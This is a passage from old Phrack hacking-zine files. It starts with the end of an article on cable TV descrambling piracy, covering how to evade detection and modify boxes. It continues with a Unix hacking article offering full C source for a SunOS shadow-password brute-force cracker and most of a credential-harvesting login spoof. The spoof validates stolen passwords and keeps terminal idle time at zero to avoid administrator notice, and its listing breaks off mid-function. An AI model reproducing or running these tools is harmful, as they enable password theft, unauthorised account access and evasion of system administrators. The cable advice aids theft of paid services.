patented and Pioneer doesn't want you to know how it works.  From the
patent, it appears to use combinations of in-band, out-band, and keys
(also sending false keys) to scramble and relay info necessary to
descramble.  These boxes are damn slick.  The relevant patents are US
#5,113,411 and US #4,149,158 if you care to look.  There is not much
information to be gained from them.  Look for future updates to this
article with info on the system if I can find any :)

Other systems are the VideoCipher + (used on satellites now - this is
scary shit.)  It uses DES-encrypted audio.  DigiCable and DigiCipher are
similar, with Digi encrypting the video with DES also  (yikes)...  And
they all use changing keys and other methods.  Oak Sigma converters use
similar methods which are available now on cable.  (digital encryption of
audio, etc...)

Part II.  How the cable company catches you getting those signals

There are many methods the CATV company can use to catch you, or at
least keep you from using certain methods.

Market Code:   Almost _all_ addressable decoders now use a market code.
                This is part of the serial number (which is used for pay
                per view addressing) which decodes to a general geographic
                region.  Most boxes contain code which tell it to shut
                down if it receives a code (which can be going to any box
                on the cable system) which is from a different market area.
                So if you buy a converter that is say, market-coded for
                Los Angeles, you won't be able to use it in New York.

Bullets:        The bullet is a shut down code like above - it will make
                your box say 'bAh' and die.  The method used most is for
                the head end to send messages to every box they know of
                saying 'ignore the next shutdown message' ... and once
                every (legit) box has this info, it sends the bullet.
                The only boxes that actually process the bullet are ones
                which the CATV system doesn't know about.  P.S.  Don't
                call the cable company and complain about cable if you
                are using an illegal converter - and be sure to warn
                anyone you live with about calling the CATV co. also.

Leak Detection: The FCC forces all cable companies to drive around and
                look for leaks - any poor splice jobs (wiring your house
                from a neighbors without sealing it up nice) and some
                descramblers will emit RF.  So while the CATV is looking
                for the leaks, they may catch you.

Free T-Shirts: The cable company can, with most boxes, tell the box to
                display a different signal.  So they can tell every box
                they know of (the legit box pool) to display a commercial
                on another channel, while the pirate boxes get this real
                cool ad with an 1800 number for free t-shirts... you call,
                you get busted.  This is mostly done during PPV boxing or
                other events which are paid for - as the company knows
                exactly who should get that signal, and can catch even
                legit boxes which are modified to receive the fight.

Your Pals:      Programs like "Turn in a cable pirate and get $100" let
                you know who your friends _really_ are.


Part III:  How to get away with it.

I get a lot of questions about opening a box that you own.  This is not
a good idea.  Most, if not ALL boxes today have a tamper sensor.  If you
open the box, you break a tab, flip a switch, etc...  This disables the
box and leaves a nice piece of evidence for the CATV co. to show that you
played with it.

I also have had questions about the old "unplug the box when it is
enabled, then plug it back in later"...  The CATV company periodically
sends a signal to update all the boxes to where they should be.  If you
want to do this, you'll need to find out where the CATV sends the address
information, and then you need to trap it out of the signal.  So as soon
as the fraudulent customer (let's call him Chris) sees his box get the
signal to receive the PPV porn channel, he installs the trap and now his
box will never get any pay per view signals again...  but he'll always
have whatever he was viewing at the time he put the trap in.  Big problem
here is that most _newer_ systems also tell the box how long it can
descramble that channel - i.e.  "Watch SPICE until I tell you not to, or 3
hours have passed"...

Where to make/buy/get porno boxes:

You can order a box which has been modified not to accept bullets.  This
method is pretty expensive.  You can also get a 'pan' descrambler - it is
a separate piece that takes whatever goes in on channel 3 (or 2 or 4) and
descrambles it.  These boxes can't be killed by the bullets, and work
pretty well.  There are some pans which are made by the same company as
your cable box and are sensitive to bullets, so beware.

There are two basic ideas for modifying a box (provided you get detailed
instructions on how to get it open, or how to fix it once you open it).
You can change the S/N to something which is known as 'universal' or
disassemble the code and remove the jump to the shutdown code.
The universal codes are rare, and may be extinct.  Besides, if the cable
company finds out your code, they can nuke it.  This happens when someone
who makes (err made) 'universal' chips gets busted.  The modification of
the actual code is the best way to do it, just forcing a positive
response to permission checks is the easiest way.

A 'cube' is not a NeXT, it's a device which removes the data signal from
the cable line, and inserts a 'nice' data signal which tells your box to
turn everything on.  A 'destructive' cube actually re-programs all the
boxes below it to a new serial number and gives that number full
privileges, while a 'non-destructive' cube needs to know your boxes
serial number, so it can tell your box (without modifications) that it
can view everything.  You have to get a new IC if you change boxes, but
the plus is that you can remove the cube and the box functions as
normal.  Then again, you have to trust the place you are ordering the
cube from to not be working for the cable company, as you have to give
them your box serial number - which the CATV cable has in their records.
Cubes have been seen for sale in the back of Electronics Now (formerly
Radio Electronics).

Of course, you could check in the above mentioned articles and build
circuitry, it would be a lot cheaper.  The only problem is that you have
to be good enough not to fuck it up - TV signals are very easy to fuck up.

Then there is the HOLY GRAIL.  Most scrambling systems mess with the sync
pulse.  This pulse is followed by the colorburst signal on NTSC video.
Basically, the grail finds the colorburst and uses it as a reference
signal.  In theory, it works wonderfully (but does not fix the video
inversion problems found on SSAVI systems).  However, with the sync pulse
whacked, the colorburst method may give weak color or color shifts.  The
schematics are in the May 1990 Radio-Electronics.  I have also received
email from aa570@cleveland.Freenet.Edu about his colorburst kit, which is
a modified (supposedly higher quality) version of the R-E schematics.
The schematic and parts list is 5 bucks, 16 bucks for a pre-drilled and
etched board.  A little steep, but not too bad.  E-mail the above for
more information.


Anyway, that's all for now.  Remember, information (including XXX movies)
wants to be free!

Carl Corey / dEs
 


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 11 of 28

****************************************************************************


                    ***********************************
                    * Unix Hacking Tools of the Trade *
                    *                                 *
                    *                By               *
                    *                                 *
                    *  The Shining/UPi (UK Division)  *
                    ***********************************

Disclaimer :

The following text is for educational purposes only and I strongly suggest
that it is not used for malicious purposes....yeah right!


Introduction :

Ok, I decided to release this phile to help out all you guys who wish to
start hacking unix. Although these programs should compile & run
on your system if you follow the instructions I have given, knowing a bit
of C will come in handy if things go wrong. Other docs I suggest you read
are older 'phrack' issues with shooting sharks various articles on unix,
and of course, 'Unix from the ground up' by The Prophet.

This article includes three programs, a SUNOS Brute force Shadow password
file cracker, The Ultimate Login Spoof, and a Unix Account Validator.





                               Shadow Crack
                               ------------

            SUNOS Unix brute force shadow password file cracker
            ---------------------------------------------------

Well, a while back, I saw an article in phrack which included a brute force
password cracker for unix. This was a nice idea, except that these days
more and more systems are moving towards the shadow password scheme. This,
for those of you who are new to unix, involves storing the actual encrypted
passwords in a different file, usually only accessible to root. A typical
entry from a System V R4 password file looks like this :-

root:x:0:1:Sys. admin:/:/bin/sh


with the actual encrypted password replaced by an 'x' in the /etc/passwd
file. The encrypted password is stored in a file(in the case of sysV)
called /etc/shadow which has roughly the following format :-

root:XyfgFekj95Fpq:::::


this includes the login i.d., the encrypted password, and various other
fields which hold info on password ageing etc...(no entry in the other
fields indicate they are disabled).

Now this was fine as long as we stayed away from system V's, but now a
whole load of other companies have jumped on the bandwagon from IBM (aix)
to Suns SUNOS systems. The system I will be dealing with is SUNOS's
shadowed system. Now, like sysV, SUNOS also have a system whereby the
actual encrypted passwords are stored in a file usually called
/etc/security/passwd.adjunct, and normally this is accessible only by root.
This rules out the use of brute force crackers, like the one in phrack
quite a while back, and also modern day programs like CRACK. A typical
/etc/passwd file entry on shadowed SUNOS systems looks like this :-

root:##root:0:1:System Administrator:/:/bin/csh

with the 'shadow' password file taking roughly the same format as that of
Sys V, usually with some extra fields.

However, we cannot use a program like CRACK, but SUNOS also supplied a
function called pwdauth(), which basically takes two arguments, a login
name and decrypted password, which is then encrypted and compared to the
appropriate entry in the shadow file, thus if it matches, we have a valid
i.d. & password, if not, we don't.

I therefore decided to write a program which would exploit this function,
and could be used to get valid i.d's and passwords even on a shadowed
system!

To my knowledge the use of the pwdauth() function is not logged, but I could
be wrong. I have left it running for a while on the system I use and it has
attracted no attention, and the administrator knows his shit. I have seen
the functions getspwent() and getspwnam() in Sys V to manipulate the
shadow password file, but not a function like pwdauth() that will actually
validate the i.d. and password. If such a function does exist on other
shadowed systems then this program could be very easily modified to work
without problems.

The only real beef I have about this program is that because the
pwdauth() function uses the standard unix crypt() function to encrypt the
supplied password, it is very slow!!! Even in burst mode, a password file
with 1000's of users could take a while to get through. My advice is
to run it in the background and direct all its screen output to /dev/null
like so :-

shcrack -mf -uroot -ddict1 > /dev/null &

Then you can log out then come back and check on it later!

The program works in a number of modes, all of which I will describe below,
is command line driven, and can be used to crack both multiple accounts in
the password file and single accounts specified. It is also NIS/NFS (Sun
Yellow Pages) compatible.


How to use it
-------------

shcrack  -m[mode]  -p[password file]  -u[user id]  -d[dictionary file]

Usage :-

-m[mode]  there are 3 modes of operation :-

-mb  Burst mode, this scans the password file, trying the minimum number
     of password guessing strategies on every account.

-mi  Mini-burst mode, this also scans the password file, and tries most
     password guessing strategies on every account.

-mf  Brute-force mode, tries all password strategies, including the use
     of words from a dictionary, on a single account specified.


more about these modes in a sec, the other options are :-


-p[password file]  This is the password file you wish to use, if this is
                   left unspecified, the default is /etc/passwd.
                   NB: The program automatically detects and uses the
                   password file wherever it may be in NIS/NFS systems.


-u[user id]  The login i.d. of the account you wish to crack, this is used
             in Brute-force single user mode.


-d[dict file]  This uses the words in a dictionary file to generate
               possible passwords for use in single user brute force
               mode. If no filename is specified, the program only uses the
               password guessing strategies without using the dictionary.


Modes
^^^^^

-mb  Burst mode basically gets each account from the appropriate password
     file and uses two methods to guess its password. Firstly, it uses the
     account name as a password, this name is then reversed and tried as a
     possible password. This may seem like a weak strategy, but remember,
     the users passwords are already shadowed, and therefore are deemed to
     be secure. This can lead to sloppy passwords being used, and I have
     came across many cases where the user has used his/her i.d. as a
     password.


-mi Mini-burst mode uses a number of other password generating methods
    as well as the 2 listed in burst mode. One of the methods involves
    taking the login i.d. of the account being cracked, and appending the
    numbers 0 to 9 to the end of it to generate possible passwords. If
    this mode has no luck, it then uses the accounts gecos 'comment'
    information from the password file, splitting it into words and
    trying these as passwords. Each word from the comment field is also
    reversed and tried as a possible password.


-mf Brute-force single user mode uses all the above techniques for password
    guessing as well as using a dictionary file to provide possible
    passwords to crack a single account specified. If no dictionary filename
    is given, this mode operates on the single account using the
    same methods as mini-burst mode, without the dictionary.


Using shadow crack
------------------

To get program help from the command line just type :-

$ shcrack <RETURN>

which will show you all the modes of operation.

If you wanted to crack just the account 'root', located in
/etc/passwd(or elsewhere on NFS/NIS systems), using all methods
including a dictionary file called 'dict1', you would do :-

$ shcrack -mf -uroot -ddict1


to do the above without using the dictionary file, do :-

$ shcrack -mf -uroot


or to do the above but in password file 'miner' do :-

$ shcrack -mf -pminer -uroot


to start cracking all accounts in /etc/passwd, using minimum password
strategies do :-

$ shcrack -mb


to do the above but on a password file called 'miner' in your home
directory do :-

$ shcrack -mb -pminer


to start cracking all accounts in 'miner', using all strategies except
dictionary words do :-

$ shcrack -mi -pminer


ok, heres the code, ANSI C Compilers only :-

---cut here-------------------------------------------------------------------

/* Program   : Shadow Crack
   Author    : (c)1994 The Shining/UPi (UK Division)
   Date      : Released 12/4/94
   Unix type : SUNOS Shadowed systems only */

#include <stdio.h>
#include <pwd.h>
#include <string.h>
#include <ctype.h>
#include <signal.h>

#define WORDSIZE 20     /* Maximum word size */
#define OUTFILE "data"  /* File to store cracked account info */

void word_strat( void ), do_dict( void );
void add_nums( char * ), do_comment( char * );
void try_word( char * ), reverse_word( char * );
void find_mode( void ), burst_mode( void );
void mini_burst( void ), brute_force( void );
void user_info( void ), write_details( char * );
void pwfile_name( void ), disable_interrupts( void ), cleanup();


char *logname, *comment, *homedir, *shell, *dict, *mode,
     *pwfile, *pwdauth();
struct passwd *getpwnam(), *pwentry;
extern char *optarg;
int option, uid, gid;


int main( int argc, char **argv )
{
disable_interrupts();
system("clear");

if (argc < 2) {
printf("Shadow Crack - (c)1994 The Shining\n");
printf("SUNOS Shadow password brute force cracker\n\n");
printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]);
printf("-d[dictfile]\n\n\n");
printf("[b] is burst mode, scans pwfile trying minimum\n");
printf("    password strategies on all i.d's\n\n");
printf("[i] is mini-burst mode, scans pwfile trying both\n");
printf("    userid, gecos info, and numbers to all i.d's\n\n");
printf("[f] is bruteforce mode, tries all above stategies\n");
printf("    as well as dictionary words\n\n");
printf("[pwfile]   Uses the password file [pwfile], default\n");
printf("           is /etc/passwd\n\n");
printf("[loginid]  Account you wish to crack, used with\n");
printf("           -mf bruteforce mode only\n\n");
printf("[dictfile] uses dictionary file [dictfile] to\n");
printf("           generate passwords when used with\n");
printf("           -mf bruteforce mode only\n\n");
exit(0);
}


/* Get options from the command line and store them in different
   variables */

while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF)
 switch(option)
 {
   case 'm':
           mode = optarg;
           break;

   case 'p':
           pwfile = optarg;
           break;

   case 'u':
           logname = optarg;
           break;

   case 'd':
           dict = optarg;
           break;

   default:
           printf("wrong options\n");
           break;
 }

find_mode();
}


/* Routine to redirect interrupts */

void disable_interrupts( void )
{
signal(SIGHUP, SIG_IGN);
 signal(SIGTSTP, cleanup);
  signal(SIGINT, cleanup);
 signal(SIGQUIT, cleanup);
signal(SIGTERM, cleanup);
}


/* If CTRL-Z or CTRL-C is pressed, clean up & quit */

void cleanup( void )
{
FILE *fp;

if ((fp = fopen("gecos", "r")) != NULL)
   remove("gecos");

if ((fp = fopen("data", "r")) == NULL)
   printf("\nNo accounts cracked\n");

printf("Quitting\n");
exit(0);
}


/* Function to decide which mode is being used and call appropriate
   routine */

void find_mode( void )
{
 if (strcmp(mode, "b") == NULL)
    burst_mode();
 else
 if (strcmp(mode, "i") == NULL)
    mini_burst();
 else
 if (strcmp(mode, "f") == NULL)
    brute_force();
 else
  {
    printf("Sorry - No such mode\n");
    exit(0);
  }
}


/* Get a users information from the password file */

void user_info( void )
{
  uid = pwentry->pw_uid;
   gid = pwentry->pw_gid;
    comment = pwentry->pw_gecos;
   homedir = pwentry->pw_dir;
  shell = pwentry->pw_shell;
}



/* Set the filename of the password file to be used, default is
   /etc/passwd */

void pwfile_name( void )
{
if (pwfile != NULL)
    setpwfile(pwfile);
}



/* Burst mode, tries user i.d. & then reverses it as possible passwords
   on every account found in the password file */

void burst_mode( void )
{
pwfile_name();
setpwent();

  while ((pwentry = getpwent()) != (struct passwd *) NULL)
  {
     logname = pwentry->pw_name;
      user_info();
      try_word( logname );
     reverse_word( logname );
  }

endpwent();
}


/* Mini-burst mode, try above combinations as well as other strategies
   which include adding numbers to the end of the user i.d. to generate
   passwords or using the comment field information in the password
   file */

void mini_burst( void )
{
pwfile_name();
setpwent();

  while ((pwentry = getpwent()) != (struct passwd *) NULL)
  {
     logname = pwentry->pw_name;
      user_info();
     word_strat();
  }

endpwent();
}


/* Brute force mode, uses all the above strategies as well using a
   dictionary file to generate possible passwords */

void brute_force( void )
{
pwfile_name();
setpwent();

  if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) {
     printf("Sorry - User unknown\n");
     exit(0);
  }
  else
  {
     user_info();
      word_strat();
     do_dict();
  }

endpwent();
}


/* Calls the various password guessing strategies */

void word_strat()
{
 try_word( logname );
  reverse_word( logname );
   add_nums( logname );
  do_comment( comment );
}


/* Takes the user name as its argument and then generates possible
   passwords by adding the numbers 0-9 to the end. If the username
   is greater than 7 characters, don't bother */

void add_nums( char *wd )
{
int i;
char temp[2], buff[WORDSIZE];

if (strlen(wd) < 8) {

  for (i = 0; i < 10; i++)
  {
      strcpy(buff, wd);
       sprintf(temp, "%d", i);
        strcat(wd, temp);
       try_word( wd );
      strcpy(wd, buff);
  }

 }
}



/* Gets info from the 'gecos' comment field in the password file,
   then process this information generating possible passwords from it */

void do_comment( char *wd )
{
FILE *fp;

char temp[2], buff[WORDSIZE];
int c,  flag;

flag = 0;


/* Open file & store users gecos information in it. w+ mode
   allows us to write to it & then read from it. */

if ((fp = fopen("gecos", "w+")) == NULL) {
    printf("Error writing gecos info\n");
   exit(0);
}

    fprintf(fp, "%s\n", wd);
   rewind(fp);

strcpy(buff, "");


/* Process users gecos information, separate words by checking for the
   ',' field separater or a space. */

while ((c = fgetc(fp)) != EOF)
{

 if (( c != ',' ) && ( c != ' ' )) {
     sprintf(temp, "%c", c);
    strncat(buff, temp, 1);
 }
 else
    flag = 1;


   if ((isspace(c)) || (c == ',') != NULL) {

     if (flag == 1) {
        c=fgetc(fp);

        if ((isspace(c)) || (iscntrl(c) == NULL))
           ungetc(c, fp);
     }

     try_word(buff);
      reverse_word(buff);
       strcpy(buff, "");
      flag = 0;
     strcpy(temp, "");
   }

}
fclose(fp);
remove("gecos");
}



/* Takes a string of characters as its argument(in this case the login
   i.d., and then reverses it */

void reverse_word( char *wd )
{
char temp[2], buff[WORDSIZE];
int i;

i = strlen(wd) + 1;
 strcpy(temp, "");
strcpy(buff, "");

 do
 {
    i--;
    if ((isalnum(wd[i]) || (ispunct(wd[i]))) != NULL) {
        sprintf(temp, "%c", wd[i]);
       strncat(buff, temp, 1);
    }

 } while(i != 0);

if (strlen(buff) > 1)
   try_word(buff);
}



/* Read one word at a time from the specified dictionary for use
   as possible passwords, if dictionary filename is NULL, ignore
   this operation */

void do_dict( void )
{
FILE *fp;
char buff[WORDSIZE], temp[2];
int c;

strcpy(buff, "");
strcpy(temp, "");


if (dict == NULL)
   exit(0);

   if ((fp = fopen(dict, "r")) == NULL) {
       printf("Error opening dictionary file\n");
      exit(0);
   }

rewind(fp);


 while ((c = fgetc(fp)) != EOF)
 {
  if ((c != ' ') || (c != '\n')) {
     strcpy(temp, "");
      sprintf(temp, "%c", c);
     strncat(buff, temp, 1);
  }

  if (c == '\n') {
    if (buff[0] != ' ')
       try_word(buff);

      strcpy(buff, "");
  }
 }

fclose(fp);
}


/* Process the word to be used as a password by stripping \n from
   it if necessary, then use the pwdauth() function, with the login
   name and word to attempt to get a valid id & password */

void try_word( char pw[] )
{
int pwstat, i, pwlength;
char temp[2], buff[WORDSIZE];

strcpy(buff, "");
pwlength = strlen(pw);

for (i = 0; i != pwlength; i++)
{

 if (pw[i] != '\n') {
     strcpy(temp, "");
     sprintf(temp, "%c", pw[i]);
    strncat(buff, temp, 1);
 }
}

 if (strlen(buff) > 3 ) {
     printf("Trying : %s\n", buff);

     if (pwstat = pwdauth(logname, buff) == NULL) {
         printf("Valid Password! - writing details to 'data'\n");

         write_details(buff);

        if (strcmp(mode, "f") == NULL)
           exit(0);
     }
 }
}



/* If valid account & password, store this, along with the accounts
   uid, gid, comment, homedir & shell in a file called 'data' */

void write_details( char *pw )
{
FILE *fp;

if ((fp = fopen(OUTFILE, "a")) == NULL) {
    printf("Error opening output file\n");
   exit(0);
}

fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid);
 fprintf(fp, "%s:%s:%s\n", comment, homedir, shell);
fclose(fp);
}

---cut here-------------------------------------------------------------------

again to compile it do :-

$ gcc shcrack.c -o shcrack

or

$ acc shcrack.c -o shcrack

this can vary depending on your compiler.




                         The Ultimate Login Spoof
                         ^^^^^^^^^^^^^^^^^^^^^^^^

Well this subject has been covered many times before but its a while since
I have seen a good one, and anyway I thought other unix spoofs have had two
main problems :-

1) They were pretty easy to detect when running
2) They recorded any only shit entered.....


Well now I feel these problems have been solved with the spoof below.
Firstly, I want to say that no matter how many times spoofing is deemed as
a 'lame' activity, I think it is very underestimated.


When writing this I have considered every possible feature such a program
should have. The main ones are :-


1) To validate the entered login i.d. by searching for it in the
   password file.

2) Once validated, to get all information about the account entered
   including - real name etc from the comment field, homedir info
   (e.g. /homedir/miner) and the shell the account is using and
   store all this in a file.

3) To keep the spoofs tty idle time to 0, thus not to arouse the
   administrators suspicions.

4) To validates passwords before storing them, on all unshadowed unix systems
   & SUNOS shadowed/unshadowed systems.

5) To emulates the 'sync' dummy account, thus making it act like the
   real login program.

6) Disable all interrupts(CTRL-Z, CTRL-D, CTRL-C), and automatically
   quit if it has not grabbed an account within a specified time.

7) To automatically detect & display the hostname before the login prompt
   e.g. 'ccu login:', this feature can be disabled if desired.

8) To run continuously until a valid i.d. & valid password are entered.



As well as the above features, I also added a few more to make the spoof
'foolproof'. At university, a lot of the users have been 'stung' by
login spoofs in the past, and so have become very conscious about security.

For example, they now try and get around spoofs by entering any old crap when
prompted for their login name, or to hit return a few times, to prevent any
'crappy' spoofs which may be running. This is where my spoof shines!,
firstly if someone was to enter -

login: dhfhfhfhryr
Password:


into the spoof, it checks to see if the login i.d. entered is
valid by searching for it in the password file. If it exists, the
spoof then tries to validate the password. If both the i.d. & password
are valid, these will be stored in a file called .data, along with
additional information about the account taken directly from the password
file.

Now if, as in the case above, either the login name or password is
incorrect, the information is discarded, and the login spoof runs again,
waiting for a valid user i.d. & password to be entered.

Also, a lot of systems these days have an unpassworded account called
'sync', which when logged onto, usually displays the date & time the
sync account was last logged into, and from which server or tty,
the message of the day, syncs the disk, and then logs you straight out.

A few people have decided that the best way to dodge login spoofs is to
first login to this account then when they are automatically logged out,
to login to their own account.

They do this firstly, so that if a spoof is running it only records the
details of the sync account and secondly the spoof would not act as the
normal unix login program would, and therefore they would spot it and report
it, thus landing you in the shit with the system administrator.

However, I got around this problem so that when someone
tries to login as sync (or another account of a similar type, which you can
define), it acts exactly like the normal login program would, right down to
displaying the system date & time as well as the message of the day!!


                          The idle time facility
                          ----------------------

One of the main problems with unix spoofs, is they can be spotted
so easily by the administrator, as he/she could get a list of current
users on the system and see that an account was logged on, and had been
idle for maybe 30 minutes. They would then investigate & the spoof
would be discovered.

I have therefore incorporated a scheme in the spoof whereby
approx. every minute, the tty the spoof is executed from, is 'touched'
with the current time, this effectively simulates terminal activity &
keeps the terminals idle time to zero, which helps the spoofs chances
of not being discovered greatly.

The spoof also incorporates a routine which will automatically
keep track of approximately how long the spoof has been running, and if
it has been running for a specified time without grabbing an i.d. or password,
will automatically exit and run the real login program.
This timer is by default set to 12.5 minutes, but you can alter this time
if you wish.

Note: Due to the varying processing power of some systems, I could not
      set the timer to exactly 60 seconds, I have therefore set it to 50,
      incase it loses or gains extra time. Take this into consideration when
      setting the spoofs timer to your own value. I recommend you
      stick with the default, and under no circumstances let it run
      for hours.



                      Password Validation techniques
                      ------------------------------

The spoof basically uses 2 methods of password validation(or none at
all on a shadowed system V). Firstly, when the spoof is used on any unix
with an unshadowed password file, it uses the crypt function to validate a
password entered. If however the system is running SUNOS 4.1.+ and
incorporates the shadow password system, the program uses a function called
pwdauth(). This takes the login i.d. & decrypted password as its arguments
and checks to see if both are valid by encrypting the password and
comparing it to the shadowed password file which is usually located in
/etc/security and accessible only by root. By validating both the i.d. &
password we ensure that the data which is saved to file is correct and not
any old bullshit typed at the terminal!!!



                            Executing the Spoof
                            -------------------


ok, now about the program. This is written in ANSI-C, so I hope you have a
compatible compiler, GCC or suns ACC should do it. Now the only time you
will need to change to the code is in the following circumstances :-

1) If you are to compile & run it on an unshadowed unix,
   in which case remove all references to the pwdauth() function,
   from both the declarations & the shadow checking routine, add
   this code in place of the shadow password checking routine :-

        if ( shadow == 1 ) {
             invalid = 0;
          else
             invalid = 1;
       }

2) Add the above code also to the spoof if you are running this on a system
   V which is shadowed. In this case the spoof loses its ability to
   validate the password, to my knowledge there is no sysV equivalent
   of the pwdauth() function.

Everything else should be pretty much compatible. You should have no
problems compiling & running this on an unshadowed SUNOS machine, if
you do, make the necessary changes as above, but it compiled ok
on every unshadowed SUNOS I tested it on. The Spoof should
automatically detect whether a SUNOS system is shadowed or unshadowed
and run the appropriate code to deal with each situation.

Note: when you have compiled this spoof, you MUST 'exec' it from the
      current shell for it to work, you must also only have one shell
      running. e.g. from C or Bourne shell using the GNU C Compiler do :-

$ gcc spoof.c -o spoof
$ exec spoof

This replaces the current shell with the spoof, so when the spoof quits &
runs the real login program, the hackers account is effectively logged off.

ok enough of the bullshit, here's the spoof :-


----------cut here-------------------------------------------------------

/* Program   : Unix login spoof
   Author    : The Shining/UPi (UK Division)
   Date      : Released 12/4/94
   Unix Type : All unshadowed unix systems &
               shadowed SUNOS systems
   Note      : This file MUST be exec'd from the shell. */


#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <pwd.h>
#include <time.h>
#include <utime.h>

#define OUTFILE ".data"           /* Data file to save account info into */
#define LOGPATH "/usr/bin/login"  /* Path of real login program */
#define DUMMYID "sync"            /* Dummy account on your system */
#define DLENGTH 4                 /* Length of dummy account name */


FILE *fp;


/* Set up variables to store system time & date */

time_t now;

static int time_out, time_on, no_message, loop_cnt;


/* Set up a structure to store users information */

struct loginfo {
              char logname[10];
              char key[9];
              char *comment;
              char *homedir;
              char *shell;
            } u;


/* Use the unix function getpass() to read user password and
   crypt() or pwdauth()  (remove it below if not SUNOS)
   to validate it etc */

char *getpass(), *gethostname(), *alarm(), *sleep(),
     *crypt(), *ttyname(), *pwdauth(), motd, log_date[60],
     pass[14], salt[3], *tty, cons[] = " on console ",
     hname[72], *ld;


/* flag = exit status, ppid = pid shell, wait = pause length,
   pwstat = holds 0 if valid password, shadow holds 1 if shadow
   password system is being used, 0 otherwise. */

int flag, ppid, wait, pwstat, shadow, invalid;


/* Declare main functions */

     void write_details(struct loginfo *);
     void catch( void ), disable_interrupts( void );
     void log_out( void ), get_info( void ),
          invalid_login( void ), prep_str( char * );


/* set up pointer to point to pwfile structure, and also
   a pointer to the utime() structure */


struct passwd *pwentry, *getpwnam();
struct utimbuf *times;


int main( void )
{
system("clear");

/* Initialise main program variables to 0, change 'loop_cnt' to 1
   if you do not want the machines host name to appear with
   the login prompt! (e.g. prompt is `login:` instead of
   'MIT login:'  etc) */

     wait = 3;               /* Holds value for pause */
      flag = 0;              /* Spoof ends if value is 1 */
       loop_cnt = 0;         /* Change this to 1 if no host required */
       time_out = 0;         /* Stops timer if spoof has been used */
      time_on = 0;           /* Holds minutes spoof has been running */
     disable_interrupts();   /* Call function to disable Interrupts */


/* Get system time & date and store in log_date, this is
   displayed when someone logs in as 'sync' */

 now = time(NULL);
  strftime(log_date, 60, "Last Login: %a %h %d %H:%M:%S", localtime(&now));
  strcat(log_date, cons);
 ld = log_date;


/* Get Hostname and tty name */

gethostname(hname, 64);
 strcat(hname, " login: ");
tty = ttyname();


/* main routine */

  while( flag == 0 )
  {
       invalid = 0;        /* Holds 1 if id +/or pw are invalid */
        shadow = 0;        /* 1 if shadow scheme is in operation */
         no_message = 0;   /* Flag for Login Incorrect msg */
        alarm(50);         /* set timer going */
       get_info();         /* get user i.d. & password */


/* Check to see if the user i.d. entered is 'sync', if it is
   display system time & date, display message of the day and
   then run the spoof again, insert the account of your
   choice here, if its not sync, but remember to put
   the length of the accounts name next to it! */

     if (strncmp(u.logname, DUMMYID, DLENGTH) == NULL) {
        printf("%s\n", ld);

          if ((fp = fopen("/etc/motd", "r")) != NULL) {
              while ((motd = getc(fp)) != EOF)
                     putchar(motd);

              fclose(fp);
          }

           printf("\n");
             prep_str(u.logname);
             no_message = 1;
           sleep(wait);
     }


/* Check if a valid user i.d. has been input, then check to see if
   the password system is shadowed or unshadowed.
   If both the user i.d. & password are valid, get additional info
   from the password file, and store all info in a file called .data,
   then exit spoof and run real login program */

    setpwent();   /* Rewind pwfile to beign processing */


    if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) {
         invalid = 1;
        flag = 0;
    }
    else
       strncpy(salt, pwentry->pw_passwd, 2);


/* Check for shadowed password system, in SUNOS, the field in /etc/passwd
   should begin with '##', in system V it could contain an 'x', if none
   of these exist, it checks that the entry = 13 chars, if less then
   shadow system will probably be implemented (unless acct has been
   disabled) */

 if ( invalid == 0 ) {

       if ((strcmp(salt, "##")) || (strncmp(salt, "x", 1)) == NULL)
           shadow = 1;
       else
          if (strlen(pwentry->pw_passwd) < 13)
             shadow = 1;


/* If unshadowed, use the salt from the pwfile field & the key to
   form the encrypted password which is checked against the entry
   in the password file, if it matches, then all is well, if not,
   spoof runs again!! */

    if ( shadow != 1 ) {

      if (strcmp(pwentry->pw_passwd, crypt(u.key, salt)) == NULL)
         invalid = 0;
      else
         invalid = 1;
    }


/* If SUNOS Shadowing is in operation, use the pwdauth() function
   to validate the password, if not SUNOS, substitute this code
   with the routine I gave earlier! */

       if ( shadow == 1 ) {
          if (pwstat = pwdauth(u.logname, u.key) == NULL)
             invalid = 0;
          else
             invalid = 1;
       }
}


/* If we have a valid account & password, get user info from the
   pwfile & store it */

        if ( invalid == 0 ) {

           u.comment = pwentry->pw_gecos;
            u.homedir = pwentry->pw_dir;
           u.shell = pwentry->pw_shell;

          /* Open file to store user info */

           if ((fp = fopen(OUTFILE, "a")) == NULL)
              log_out();

               write_details(&u);
                fclose(fp);
                no_message = 1;
               flag = 1;
        }
        else
           flag = 0;

        invalid_login();

    endpwent();                       /* Close pwfile */

    if (no_message == 0)
       loop_cnt++;

  }                                  /* end while */

log_out();                           /* call real login program */

}


/* Function to read user i.d. & password */

void get_info( void )
{
   char user[11];
   unsigned int string_len;

   fflush(stdin);
    prep_str(u.logname);
    prep_str(u.key);
   strcpy(user, "\n");


/* Loop while some loser keeps hitting return when asked for user
   i.d. and if someone hits CTRL-D to break out of spoof. Enter
   a # at login to exit spoof. Uncomment the appropriate line(s)
   below to customise the spoof to look like your system */

  while ((strcmp(user, "\n") == NULL) && (!feof(stdin)))
  {
   /* printf("Scorch Ltd SUNOS 4.1.3\n\n); */

    if (loop_cnt > 0)
       strcpy(hname, "login: ");

      printf("%s", hname);
      fgets(user, 9, stdin);


   /* Back door for hacker, # at present, can be changed,
      but leave \n in. */

     if (strcmp(user, "#\n") == NULL)
         exit(0);


    /* Strip \n from login i.d. */

     if (strlen(user) < 8)
        string_len = strlen(user) - 1;
     else
        string_len = strlen(user);

     strncpy(u.logname, user, string_len);



/* check to see if CTRL-D has occurred because it does not
   generate an interrupt like CTRL-C, but instead generates
   an end-of-file on stdin */

     if (feof(stdin)) {
         clearerr(stdin);
        printf("\n");
     }

  }



/* Turn off screen display & read users password */

     strncpy(u.key, getpass("Password:"), 8);

}



/* Function to increment the timer which holds the amount of time
   the spoof has been running */

void catch( void )
{
  time_on++;


/* If spoof has been running for 15 minutes, and has not
   been used, stop timer and call spoof exit routine */

if ( time_out == 0 ) {
   if (time_on == 15) {
       printf("\n");
        alarm(0);
       log_out();
   }
}


/* 'Touch' your tty, effectively keeping terminal idle time to 0 */

